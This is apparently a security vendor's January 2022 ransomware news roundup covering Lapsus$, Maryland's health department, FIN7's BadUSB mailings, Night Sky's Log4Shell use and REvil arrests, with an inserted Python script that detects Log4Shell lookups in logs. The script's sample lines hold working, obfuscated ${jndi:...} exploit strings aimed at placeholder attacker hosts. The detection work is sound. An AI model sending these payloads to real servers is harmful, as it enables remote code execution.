Christopher Eaton | January 14th, 2022

Emerging Lapsus$ Ransomware Extorts Portugal’s Largest Media Conglomerate After Accessing Its AWS Account

Portugal-based media giant Impresa, owner of the nation’s largest newspaper and television station, was attacked by the Lapsus$ ransomware group. The attack became widely known when Lapsus$ replaced all Impresa websites with a ransom note. Lapsus$ then taunted its victim from the Twitter account of Impresa-owned Expresso, signaling that the group still held access to business-critical data even after some of the affected services had been restored. No information about a ransom payment or the nature of the compromised data has been made public.

Maryland Health Department Attacked by Ransomware, Preventing Health Workers from Accessing Critical Systems

According to the Chief Information Security Officer (CISO) of the state of Maryland, critical infrastructure in the state’s health department was attacked by ransomware. As a result, many patients’ health records, treatment plans, and banking information were rendered inaccessible, so some patients are receiving sub-optimal care and hospitals have not been compensated for treatment. State officials have given assurances that all state-operated systems and state-issued hardware will be replaced or restored for safe use, and Maryland’s CISO said the state would not pay the ransom demand. It remains unclear exactly what and how much data was encrypted or exfiltrated, or when the state’s health systems will be fully restored.

FIN7 Ransomware Group Is Mailing USB Devices Loaded with Ransomware to Critical Infrastructure Operations

A recent FBI alert warned that the FIN7 ransomware group, also known as Carbanak or Navigator, is actively distributing malicious USB drives through the postal system in specially designed gift boxes. The packages are crafted to look like official mailings from the U.S. Department of Health and Human Services or Amazon. The FBI described the devices as “BadUSB” keystroke-injection tools: once plugged in, the device registers as a keyboard and types commands that install malware. The FBI further indicated that the devices are being sent primarily to organizations in the transportation, insurance, and defense industries. The threat actors hope that a recipient will plug a drive into a computer, infect the network with malware, and set the stage for a later ransomware attack. It is unclear whether, or how often, recipients have actually plugged the drives in.

New Ransomware, Night Sky, Targeting Corporate Networks Using Log4j Vulnerability

Night Sky ransomware is customized per victim, containing a personalized ransom note and hardcoded credentials for the victim’s negotiation page. When launched, it encrypts all files except those ending in the “.dll” or “.exe” extensions and also skips a fixed list of system files and folders so that the machine remains bootable. Night Sky operators have recently exploited CVE-2021-44228, the critical “Log4Shell” vulnerability in the Log4j logging library, to gain access to internet-exposed VMware Horizon servers. Threat actors using this exploit, including Night Sky operators, target vulnerable machines exposed to the public internet and host their payloads and command-and-control infrastructure on domains that impersonate legitimate technology and cybersecurity companies.
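Log4Shell exploitation against an exposed service such as VMware Horizon leaves the lookup string in whatever the server logged (request path, User-Agent, or other headers), and attackers wrap “jndi” in nested lookups or URL-encoding to defeat naive grep. The script below is an added example, not code from the original article or from any vendor: it normalizes those obfuscation layers and flags the lookups in a set of constructed access-log lines (the IP addresses are from documentation ranges, not real infrastructure).

```python
"""Flag Log4Shell (CVE-2021-44228) lookup strings in web access logs.

Added example, not code from the original article. The log lines below are
constructed for illustration; the IP addresses come from documentation ranges.
"""
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic): one benign request and
# four variants of the ${jndi:...} lookup that triggers CVE-2021-44228.
SAMPLE_LOGS = [
    '203.0.113.10 - - [10/Jan/2022:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [10/Jan/2022:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.5:1389/a}"',
    '203.0.113.12 - - [10/Jan/2022:12:00:03 +0000] "GET /${${lower:j}${lower:n}${lower:d}i:rmi://198.51.100.6/x} HTTP/1.1" 404 0 "-" "curl/7.68"',
    '203.0.113.13 - - [10/Jan/2022:12:00:04 +0000] "GET /portal/info.jsp HTTP/1.1" 200 100 "-" "%24%7Bjndi%3Adns%3A%2F%2F198.51.100.7%2Fprobe%7D"',
    '203.0.113.14 - - [10/Jan/2022:12:00:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}ndi:ldap://198.51.100.8/o}"',
]

# Obfuscation layers commonly wrapped around "jndi" to dodge plain string matching:
#   ${lower:j} / ${upper:J}        -> j
#   ${::-j} / ${env:NOPE:-j}       -> j   (Log4j default-value syntax with an empty/unknown key)
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}")
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# After normalization every variant collapses to ${jndi:<protocol>:...}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:")


def normalize(text: str, max_rounds: int = 10) -> str:
    """URL-decode (repeatedly, to handle double encoding), lowercase, then unwrap
    nested lookups from the inside out until the string stops changing."""
    decoded = text
    for _ in range(max_rounds):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    decoded = decoded.lower()
    for _ in range(max_rounds):
        nxt = _CASE_LOOKUP.sub(r"\1", decoded)
        nxt = _DEFAULT_LOOKUP.sub(r"\1", nxt)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded


def find_jndi_lookups(lines):
    """Return (line_number, protocol, original_line) for every line whose
    normalized form contains a JNDI lookup."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        match = _JNDI.search(normalize(line))
        if match:
            hits.append((lineno, match.group(1), line))
    return hits


if __name__ == "__main__":
    for lineno, proto, line in find_jndi_lookups(SAMPLE_LOGS):
        print(f"line {lineno}: jndi via {proto} -> {line}")
```

Standard access logs usually record only the path and User-Agent; the exploit string can arrive in any header the application logs (X-Forwarded-For, Referer, cookies), so run the same normalization over full request logs or a web-application firewall capture where available. A hit shows an attempt, not a successful exploit; confirm by looking for the vulnerable host making outbound LDAP, RMI or DNS connections to the address embedded in the lookup.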

Ransomware Group REvil, Responsible for the Breach on Kaseya, Taken Down by Russian Authorities at U.S. Request

At the request of United States officials, agents of Russia’s Federal Security Service (FSB) conducted raids against REvil, the notorious ransomware group. REvil gained international attention after claiming responsibility for the attack on companies using Kaseya VSA remote management software, which it claimed had locked down more than a million devices; the group was also behind the attack on JBS, the world’s largest meat processor. Reports indicate that the raids netted 14 people, millions of dollars’ worth of cash and other assets, and a cache of computer equipment. The FSB stated that the US government has been notified of the action against REvil.

Every indicator points to an increase in ransomware attacks in 2022, further exposing business-critical data and personally identifiable information (PII) with devastating consequences for everyone affected. While there are many ways to improve security today—MFA, strong passwords, spear-phishing awareness training—and so reduce the likelihood of becoming a victim, threat actors continue to find ways to impact individuals and businesses. At SpearTip, we recognize the ever-changing nature of the threat landscape and have the formula to stay protected against the latest ransomware. Our team of certified engineers continuously monitors all partner endpoints from our 24/7 Security Operations Centers using our ShadowSpear Platform, a toolset providing advanced network visibility, threat detection, and immediate threat isolation.

If your company is experiencing a breach, call our Security Operations Centers at 833.997.7327 to speak directly with an engineer.